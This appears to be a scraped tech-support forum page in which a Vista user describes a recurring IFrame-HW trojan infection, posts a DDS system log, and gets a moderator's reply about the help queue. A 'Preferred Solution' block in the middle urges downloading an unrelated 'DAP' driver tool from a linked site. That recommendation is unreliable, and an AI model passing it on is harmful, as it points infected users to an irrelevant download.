Over 1 million tech questions and answers.

Infected with IFrame-HW [Trj]

Q: Infected with IFrame-HW [Trj]

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files, I use Windows Vista and some of the files infected are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to it's chest or to delete they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my pc, except Mozilla Firefox will no longer function on my pc, I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\rundll32.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\a-squared Anti-Malware\a2service.exe
C:\Windows\system32\ASTSRV.EXE
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k bthsvcs
C:\Windows\system32\CTsvcCDA.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
C:\Program Files\SMINST\BLService.exe
C:\Program Files\CyberLink\Shared files\RichVideo.exe
C:\Program Files\Photodex\ProShowProducer\ScsiAccess.exe
C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\HP\QuickPlay\QPService.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Adobe\Acrobat 8.0\Acrobat\acrotray.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Internet Download Manager\IDMan.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\CyberScrub Privacy Suite\CSRiskMon.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Common Files\MySoftware\Newsflsh.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Stardock\ObjectDock\ObjectDock.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Hewlett-Packard\HP wireless Assistant\WiFiMsg.EXE
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Internet Download Manager\IEMonitor.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Opera\opera.exe
C:\Windows\explorer.exe
C:\Users\olusanya\Desktop\dds.scr
C:\Windows\system32\wbem\wmiprvse.exe

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.gmail.com/
uDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
mStart Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
mDefault_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=91&bd=Pavilion&pf=cnnb
uInternet Settings,ProxyOverride = *.local
BHO: IDMIEHlprObj Class: {0055c089-8582-441b-a0bf-17b458c2a3a8} - c:\program files\internet download manager\IDMIECC.dll
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - No File
BHO: IeMonitorBho Class: {bf00e119-21a3-4fd1-b178-3b8537e75c92} - c:\program files\megaupload\mega manager\MegaIEMn.dll
TB: Microsoft Live Search Toolbar: {1e61ed7c-7cb8-49d6-b9e9-ab4c880c8414} - c:\program files\msn\toolbar\3.0.0541.0\msneshellx.dll
TB: Adobe PDF: {47833539-d0c5-4125-9fa8-0819e2eaac93} - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
TB: Contribute Toolbar: {517bdde4-e3a7-4570-b21e-2b52b6139fc7} - c:\program files\adobe\/Adobe Contribute CS3/contributeieplugin.dll
TB: Snagit: {8ff5e183-abde-46eb-b09e-d2aab95cabe3} - c:\program files\techsmith\snagit 9\SnagitIEAddin.dll
TB: Ask.com Toolbar: {d4027c7f-154a-4066-a1ad-4243d8127440} - c:\program files\ask.com\supertoolbar\GenericAskToolbar.dll
TB: {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
TB: {8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} - No File
TB: {32099AAC-C132-4136-9E9A-4E364A424E17} - No File
EB: Adobe PDF: {182ec0be-5110-49c8-a062-beb1d02a220b} - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll
uRun: [IDMan] c:\program files\internet download manager\IDMan.exe /onboot
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [Privacy Suite RiskMonitor] c:\program files\cyberscrub privacy suite\CSRiskMon.exe
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [CTSyncU.exe] "c:\program files\creative\sync manager unicode\CTSyncU.exe"
mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QPService] "c:\program files\hp\quickplay\QPService.exe"
mRun: [UpdateLBPShortCut] "c:\program files\cyberlink\labelprint\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\labelprint" updatewithcreateonce "software\cyberlink\labelprint\2.5"
mRun: [UpdatePSTShortCut] "c:\program files\cyberlink\dvd suite\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\dvd suite" updatewithcreateonce "software\cyberlink\PowerStarter"
mRun: [UCam_Menu] "c:\program files\cyberlink\youcam\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\youcam" update "software\cyberlink\youcam\2.0"
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [QlbCtrl.exe] c:\program files\hewlett-packard\hp quick launch buttons\QlbCtrl.exe /Start
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 9.0\reader\Reader_sl.exe"
mRun: [UpdateP2GoShortCut] "c:\program files\cyberlink\power2go\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\power2go" updatewithcreateonce "software\cyberlink\power2go\6.0"
mRun: [UpdatePDIRShortCut] "c:\program files\cyberlink\powerdirector\muitransfer\muistartmenu.exe" "c:\program files\cyberlink\powerdirector" updatewithcreateonce "software\cyberlink\powerdirector\7.0"
mRun: [HP Health Check Scheduler] c:\program files\hewlett-packard\hp health check\HPHC_Scheduler.exe
mRun: [hpWirelessAssistant] c:\program files\hewlett-packard\hp wireless assistant\HPWAMain.exe
mRun: [Acrobat Assistant 8.0] "c:\program files\adobe\acrobat 8.0\acrobat\Acrotray.exe"
mRun: [<NO NAME>]
mRun: [Adobe_ID0EYTHM] c:\progra~1\common~1\adobe\adobev~1\server\bin\VERSIO~2.EXE
mRun: [avast!] c:\progra~1\alwils~1\avast4\ashDisp.exe
mRun: [GrooveMonitor] "c:\program files\microsoft office\office12\GrooveMonitor.exe"
mRun: [FontExpertType1Loader] c:\program files\fontexpert\Type1Loader.exe
mRun: [a-squared] "c:\program files\a-squared anti-malware\a2guard.exe"
dRun: [<NO NAME>] c:\windows\temp\uayjhdq.exe
dRun: [hsf7husjnfg98gi498aejhiugjkdg4] c:\windows\temp\uayjhdq.exe
StartupFolder: c:\users\olusanya\appdata\roaming\microsoft\windows\start menu\programs\startup\ap
StartupFolder: c:\users\olusanya\appdata\roaming\micros~1\windows\startm~1\programs\startup\stardo~1.lnk - c:\program files\stardock\objectdock\ObjectDock.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\newsfl~1.lnk - c:\program files\common files\mysoftware\Newsflsh.exe
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Add to AMV Converter... - c:\program files\mp3 player utilities 4.19\amvconverter\grab.html
IE: Append to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - c:\program files\adobe\acrobat 8.0\acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Download all links with IDM - c:\program files\internet download manager\IEGetAll.htm
IE: Download FLV video content with IDM - c:\program files\internet download manager\IEGetVL.htm
IE: Download with IDM - c:\program files\internet download manager\IEExt.htm
IE: E&xport to Microsoft Excel - c:\progra~1\micros~3\office12\EXCEL.EXE/3000
IE: Sothink SWF Catcher - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC} - c:\progra~1\java\jre16~1.0_0\bin\ssv.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\micros~3\office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~3\office12\REFIEBAR.DLL
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\progra~1\micros~3\office12\GR99D3~1.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\progra~1\micros~3\office12\GRA8E1~1.DLL
SEH: DVDIdleShell Class: {93994de8-8239-4655-b1d1-5f4e91300429} - c:\program files\dvdidle pro\DVDShell.dll

============= SERVICES / DRIVERS ===============

R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [2009-6-7 114768]
R1 StarPortLite;StarPort Storage Controller (Lite);c:\windows\system32\drivers\StarPortLite.sys [2009-6-19 95592]
R2 ASTSRV;Nalpeiron Licensing Service;c:\windows\system32\ASTSRV.EXE [2009-6-10 57344]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2009-6-7 20560]
R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2009-6-7 51792]
R2 Nero BackItUp Scheduler 4.0;Nero BackItUp Scheduler 4.0;c:\program files\common files\nero\nero backitup 4\NBService.exe [2009-5-15 935208]
R2 Recovery Service for Windows;Recovery Service for Windows;c:\program files\sminst\BLService.exe [2008-10-28 365952]
R2 SBSDWSCService;SBSD Security Center Service;c:\program files\spybot - search & destroy\SDWinSec.exe [2009-7-9 1153368]
R2 SentinelKeysServer;Sentinel Keys Server;c:\program files\common files\safenet sentinel\sentinel keys server\sntlkeyssrvr.exe [2007-4-27 316992]
R3 Com4QLBEx;Com4QLBEx;c:\program files\hewlett-packard\hp quick launch buttons\Com4QLBEx.exe [2008-10-28 193840]
R3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda32v.sys [2008-5-9 43040]
S2 Norton Internet Security;Norton Internet Security;"c:\program files\norton internet security\engine\16.0.0.125\ccsvchst.exe" /s "norton internet security" /m "c:\program files\norton internet security\engine\16.0.0.125\dimaster.dll" /prefetch:1 --> c:\program files\norton internet security\engine\16.0.0.125\ccSvcHst.exe [?]

============== File Associations ===============

regfile="regedit.exe" "%1"

=============== Created Last 30 ================

2009-07-09 15:00 <DIR> --d----- c:\program files\Megaupload
2009-07-09 14:41 <DIR> --d----- c:\programdata\Spybot - Search & Destroy
2009-07-09 14:41 <DIR> --d----- c:\program files\Spybot - Search & Destroy
2009-07-09 14:41 <DIR> --d----- c:\progra~2\Spybot - Search & Destroy
2009-07-09 10:22 45,056 -------- c:\windows\system32\CTSVCCTL.EXE
2009-07-09 10:22 64,000 -------- c:\windows\system32\CTSVCCDA.EXE
2009-07-09 10:22 <DIR> --d----- c:\program files\common files\Creative
2009-07-09 10:22 <DIR> --d-h--- c:\program files\Creative Installation Information
2009-07-09 10:21 <DIR> --d----- c:\program files\Creative
2009-07-09 07:58 <DIR> --d----- c:\program files\Yahoo!
2009-07-09 07:58 <DIR> --d----- c:\program files\CCleaner
2009-07-09 00:55 <DIR> --d----- c:\program files\Your Uninstaller 2008
2009-07-09 00:53 <DIR> --d----- c:\windows\Profiles
2009-07-08 17:56 67 a------- c:\windows\DVDIdlePro.INI
2009-07-08 17:43 <DIR> --d----- c:\program files\Art Explosion
2009-07-08 17:10 <DIR> --d----- c:\programdata\BVRP Software
2009-07-08 17:10 <DIR> --d----- c:\program files\Avanquest update
2009-07-08 17:07 96 a------- c:\windows\bizpub32.INI
2009-07-08 17:02 565,760 a------- c:\windows\system32\msvcp50.DLL
2009-07-08 17:02 348,160 a------- c:\windows\system32\MFC30.DLL
2009-07-08 17:02 133,904 a------- c:\windows\system32\MFCANS32.DLL
2009-07-08 17:02 27,025 a------- c:\windows\system32\OLE2.REG
2009-07-08 17:02 5,632 a------- c:\windows\system32\MFCUIA32.DLL
2009-07-08 17:02 <DIR> --d----- c:\program files\common files\MySoftware
2009-07-08 17:02 <DIR> --d----- c:\program files\MySoftware
2009-07-08 14:43 2,560 a------- C:\DVDSample.bmk
2009-07-08 14:37 <DIR> --d----- C:\ApolloOutput
2009-07-08 14:36 <DIR> --d----- c:\program files\No1 DVD Ripper
2009-07-08 14:08 <DIR> --d----- c:\program files\Ask.com
2009-07-07 22:02 <DIR> --d----- c:\program files\DVDFab 6
2009-07-07 19:40 <DIR> --d----- c:\program files\a-squared Anti-Malware
2009-07-06 21:02 <DIR> --d----- c:\users\olusanya\appdata\roaming\Flock
2009-07-06 21:01 <DIR> --d----- c:\program files\Flock
2009-07-06 19:24 2 a------- c:\windows\0101120101464849.dat
2009-07-06 19:24 2 a------- c:\windows\010112010146118114.dat
2009-07-06 14:24 <DIR> --d----- c:\programdata\Winferno
2009-07-06 14:19 <DIR> --d----- c:\users\olusanya\appdata\roaming\WeatherBug
2009-07-06 12:22 <DIR> --d----- c:\program files\AAALOGO2008
2009-07-06 12:22 <DIR> --dsh--- c:\windows\system32\%APPDATA%
2009-07-06 12:17 <DIR> --d----- c:\users\olusanya\appdata\roaming\LogoMaker
2009-07-06 12:15 <DIR> --d----- c:\program files\Studio V5
2009-07-05 22:07 56 a---h--- c:\windows\system32\ezsidmv.dat
2009-07-03 21:58 <DIR> --d----- c:\users\olusanya\appdata\roaming\mojosoft
2009-07-03 21:58 <DIR> --d----- c:\program files\MOJOSOFT
2009-07-03 21:48 <DIR> --d----- c:\program files\CAM Development
2009-07-01 16:33 <DIR> --d----- c:\program files\common files\PX Storage Engine
2009-07-01 13:39 <DIR> --d----- C:\Course Technology
2009-06-30 14:52 <DIR> --d----- c:\program files\MediaMonkey
2009-06-28 18:45 69 a------- c:\windows\NeroDigital.ini
2009-06-28 16:06 67 a------- c:\windows\AoADVDRipper.INI
2009-06-27 19:52 72 a------- c:\windows\MediaManager.INI
2009-06-27 19:44 <DIR> --d----- c:\program files\MP3 Player Utilities 4.19
2009-06-26 16:49 <DIR> --d----- c:\program files\common files\Autodesk Shared
2009-06-26 10:30 <DIR> --d----- c:\program files\common files\Alias Shared
2009-06-26 10:27 3,734,536 a------- c:\windows\system32\d3dx9_36.dll
2009-06-26 10:24 <DIR> --d----- C:\FLEXLM
2009-06-25 23:25 16 a------- c:\windows\popcinfo.dat
2009-06-25 22:38 <DIR> --d----- c:\program files\Side Effects Software
2009-06-25 19:03 <DIR> --d----- c:\program files\common files\DAZ
2009-06-24 19:47 <DIR> --d----- c:\users\olusanya\appdata\roaming\CyberScrub
2009-06-24 19:46 84 a------- c:\windows\csact.ini
2009-06-24 19:46 <DIR> --d----- c:\program files\CyberScrub Privacy Suite
2009-06-24 18:28 <DIR> --d----- c:\users\olusanya\appdata\roaming\Queue Manager
2009-06-24 18:25 <DIR> --d----- c:\users\olusanya\appdata\roaming\Poser Pro
2009-06-24 18:07 <DIR> --d----- c:\program files\Smith Micro
2009-06-24 17:55 741,376 a------- c:\windows\iun6002ev.exe
2009-06-24 17:55 <DIR> --d----- c:\program files\Bejeweled 2 Deluxe
2009-06-24 11:15 <DIR> --d----- c:\program files\SafeNet Sentinel
2009-06-24 11:15 <DIR> --d----- c:\program files\common files\SafeNet Sentinel
2009-06-24 11:11 <DIR> --d----- c:\program files\NewTek
2009-06-24 11:11 <DIR> --d----- c:\users\olusanya\.bitrock
2009-06-22 20:11 <DIR> --d----- c:\users\olusanya\appdata\roaming\MixMeister Technology
2009-06-22 10:35 <DIR> --d--r-- c:\program files\Skype
2009-06-22 10:35 <DIR> --d----- c:\programdata\Skype
2009-06-19 21:34 <DIR> --d----- c:\program files\DVDIdle Pro
2009-06-19 20:10 51 a------- c:\windows\StarPort.INI
2009-06-19 20:04 95,592 a------- c:\windows\system32\drivers\StarPortLite.sys
2009-06-19 19:33 <DIR> --d----- c:\program files\DAEMON Tools Lite
2009-06-19 10:27 <DIR> --d----- c:\program files\Pegasus Media Software
2009-06-19 10:22 <DIR> --d----- C:\DVDMovie
2009-06-19 10:13 <DIR> --d----- c:\program files\Xvid
2009-06-19 10:13 <DIR> --d----- c:\program files\AoA DVD Ripper
2009-06-19 09:25 <DIR> --d----- c:\programdata\DVD Shrink
2009-06-18 20:12 <DIR> --d----- c:\users\olusanya\appdata\roaming\WildTangent
2009-06-18 15:45 87,608 a------- c:\users\olusanya\appdata\roaming\inst.exe
2009-06-18 15:45 47,360 a------- c:\windows\system32\drivers\pcouffin.sys
2009-06-18 15:45 47,360 a------- c:\users\olusanya\appdata\roaming\pcouffin.sys
2009-06-18 15:45 217,127 a------- c:\windows\system32\drv43260.dll
2009-06-18 15:45 208,935 a------- c:\windows\system32\drv33260.dll
2009-06-18 15:45 176,165 a------- c:\windows\system32\drv23260.dll
2009-06-18 15:45 102,439 a------- c:\windows\system32\sipr3260.dll
2009-06-18 15:45 65,602 a------- c:\windows\system32\cook3260.dll
2009-06-18 15:45 1,184,984 a------- c:\windows\system32\wvc1dmod.dll
2009-06-18 15:45 626,688 a------- c:\windows\system32\vp7vfw.dll
2009-06-18 15:45 <DIR> --d----- c:\program files\VSO
2009-06-18 14:30 <DIR> --d----- c:\programdata\LightScribe
2009-06-18 14:30 <DIR> --d----- c:\progra~2\LightScribe
2009-06-18 14:17 4,767 a------- c:\windows\Irremote.ini
2009-06-18 13:59 <DIR> --d----- c:\program files\Nero
2009-06-18 13:58 <DIR> --d----- c:\programdata\Nero
2009-06-18 13:58 <DIR> --d----- c:\progra~2\Nero
2009-06-18 13:57 1,315,328 a------- c:\windows\system32\ole32.dll
2009-06-18 13:37 <DIR> --d----- c:\users\olusanya\appdata\roaming\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\programdata\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\progra~2\Final Draft
2009-06-18 13:35 <DIR> --d----- c:\program files\Final Draft Tagger
2009-06-18 13:35 <DIR> --d----- c:\program files\Final Draft 7
2009-06-18 13:33 <DIR> --d----- c:\program files\common files\Wise Installation Wizard
2009-06-16 23:08 593,920 -------- c:\windows\system32\MJ12.exe
2009-06-16 19:10 <DIR> --d----- c:\programdata\DAEMON Tools Lite
2009-06-16 19:10 <DIR> --d----- c:\progra~2\DAEMON Tools Lite
2009-06-16 19:10 <DIR> --d----- c:\program files\DAEMON Tools Toolbar
2009-06-16 19:09 <DIR> --d----- c:\users\olusanya\appdata\roaming\DAEMON Tools Lite
2009-06-16 14:54 <DIR> --d----- c:\program files\MagicISO
2009-06-16 14:41 <DIR> --d----- c:\programdata\Magix
2009-06-16 14:41 <DIR> --d----- c:\progra~2\Magix
2009-06-16 14:40 <DIR> --d----- c:\users\olusanya\appdata\roaming\MAGIX
2009-06-16 14:40 <DIR> --d----- c:\programdata\Xara
2009-06-16 14:40 <DIR> --d----- c:\program files\Xara
2009-06-16 14:40 <DIR> --d----- c:\progra~2\Xara
2009-06-15 16:12 <DIR> --d----- c:\users\olusanya\appdata\roaming\Ableton
2009-06-15 16:12 <DIR> --d----- c:\programdata\Ableton
2009-06-15 16:12 <DIR> --d----- c:\progra~2\Ableton
2009-06-15 16:04 <DIR> --d----- c:\program files\VideoConverterPortable
2009-06-15 13:43 <DIR> --d----- c:\program files\Photodex Presenter
2009-06-15 13:42 <DIR> --d----- c:\program files\Photodex
2009-06-15 13:41 <DIR> --d----- c:\users\olusanya\appdata\roaming\Photodex
2009-06-15 09:25 368,640 a------- c:\windows\system32\rewire.dll
2009-06-15 09:25 <DIR> --d----- c:\program files\VstPlugins
2009-06-15 09:25 1,294,336 a------- c:\windows\system32\vorbis.acm
2009-06-15 09:24 <DIR> --d----- c:\program files\Image-Line
2009-06-13 14:45 <DIR> -cd-h--- c:\programdata\{7D4B3D1D-104E-4507-9123-568BC721B7E2}
2009-06-13 14:45 <DIR> -cd-h--- c:\progra~2\{7D4B3D1D-104E-4507-9123-568BC721B7E2}
2009-06-13 14:44 <DIR> --d----- c:\programdata\Transparent
2009-06-13 14:44 <DIR> --d----- c:\program files\Transparent
2009-06-13 14:44 <DIR> --d----- c:\progra~2\Transparent
2009-06-12 20:14 <DIR> --d----- c:\program files\Xilisoft
2009-06-12 16:42 <DIR> --d----- c:\program files\MP3TagEditor
2009-06-12 16:09 <DIR> --d----- c:\program files\Mp3tag
2009-06-12 16:08 <DIR> --d----- c:\programdata\Apple Computer
2009-06-12 16:04 <DIR> --d----- c:\programdata\WindowsSearch
2009-06-12 10:58 <DIR> --d----- c:\program files\ImTOO
2009-06-10 20:17 76 a------- c:\windows\system32\w3url.dll
2009-06-10 20:17 585,728 -------- c:\windows\system32\AReadyLB.dll
2009-06-10 20:17 362,496 -------- c:\windows\system32\MC13.exe
2009-06-10 20:17 229,376 -------- c:\windows\system32\AudDevicePlugin.dll
2009-06-10 20:17 183,129 -------- c:\windows\system32\AM Install1.INF
2009-06-10 20:17 73,728 -------- c:\windows\system32\BBInstaller.exe
2009-06-10 20:17 <DIR> --d----- c:\program files\J River
2009-06-10 20:17 <DIR> --d----- c:\users\olusanya\appdata\roaming\J River
2009-06-10 14:34 335,872 a------- c:\windows\system32\m4atag.dll
2009-06-10 14:34 <DIR> --d----- c:\program files\mp3Tag Pro 6
2009-06-10 11:34 57,344 a------- c:\windows\system32\ASTSRV.EXE
2009-06-10 10:40 <DIR> --d----- c:\programdata\TechSmith
2009-06-09 18:09 <DIR> --d----- c:\users\olusanya\appdata\roaming\Proxima Software

==================== Find3M ====================

2009-07-09 15:12 28,124 a------- c:\programdata\nvModes.dat
2009-07-09 15:12 28,124 a------- c:\progra~2\nvModes.dat
2009-07-08 13:27 5,642 a--sh--- c:\programdata\KGyGaAvL.sys
2009-07-08 13:27 5,642 a--sh--- c:\progra~2\KGyGaAvL.sys
2009-06-27 19:44 86,016 a------- c:\windows\inf\infstrng.dat
2009-06-27 19:44 86,016 a------- c:\windows\inf\infstor.dat
2009-06-27 19:44 51,200 a------- c:\windows\inf\infpub.dat
2009-06-19 20:05 721,904 a------- c:\windows\system32\drivers\sptd.sys
2009-06-09 14:30 8 ---shr-- c:\programdata\5E18453619.sys
2009-06-09 14:30 8 ---shr-- c:\progra~2\5E18453619.sys
2009-06-08 09:20 2,004 a------- c:\windows\registration\e10f24f0-652e-11dd-ad8b-0800200c9a66.dll
2009-06-06 18:46 0 a---h--- c:\windows\system32\drivers\Msft_User_WpdMtpDr_01_00_00.Wdf
2009-05-09 01:50 915,456 a------- c:\windows\system32\wininet.dll
2009-05-09 01:34 71,680 a------- c:\windows\system32\iesetup.dll
2009-04-30 08:37 293,376 a------- c:\windows\system32\psisdecd.dll
2009-04-30 08:37 428,544 a------- c:\windows\system32\EncDec.dll
2009-04-23 08:43 784,896 a------- c:\windows\system32\rpcrt4.dll
2009-04-23 08:42 636,928 a------- c:\windows\system32\localspl.dll
2009-04-21 07:55 2,033,152 a------- c:\windows\system32\win32k.sys
2008-10-28 08:53 665,600 a------- c:\windows\inf\drvindex.dat
2008-01-20 22:43 174 a--sh--- c:\program files\desktop.ini
2006-11-02 08:42 287,440 a------- c:\windows\inf\perflib\0409\perfi.dat
2006-11-02 08:42 287,440 a------- c:\windows\inf\perflib\0409\perfh.dat
2006-11-02 08:42 30,674 a------- c:\windows\inf\perflib\0409\perfd.dat
2006-11-02 08:42 30,674 a------- c:\windows\inf\perflib\0409\perfc.dat
2006-11-02 05:20 287,440 a------- c:\windows\inf\perflib\0000\perfi.dat
2006-11-02 05:20 287,440 a------- c:\windows\inf\perflib\0000\perfh.dat
2006-11-02 05:20 30,674 a------- c:\windows\inf\perflib\0000\perfd.dat
2006-11-02 05:20 30,674 a------- c:\windows\inf\perflib\0000\perfc.dat

============= FINISH: 16:38:21.83 ===============

RELEVANCY SCORE 200
Preferred Solution: Infected with IFrame-HW [Trj]

I recommend downloading and running DAP. It can help sort out any driver and firmware related issues on your system

It's worked out well for many of us in the past.

You can download it direct from this link http://downloaddap.org. (This link will open the download page of DAP so you can save a copy to your computer.)

A: Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.Hello nu2cpu,We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.Thank you for understanding.Regards,The weatherman (Moderator)

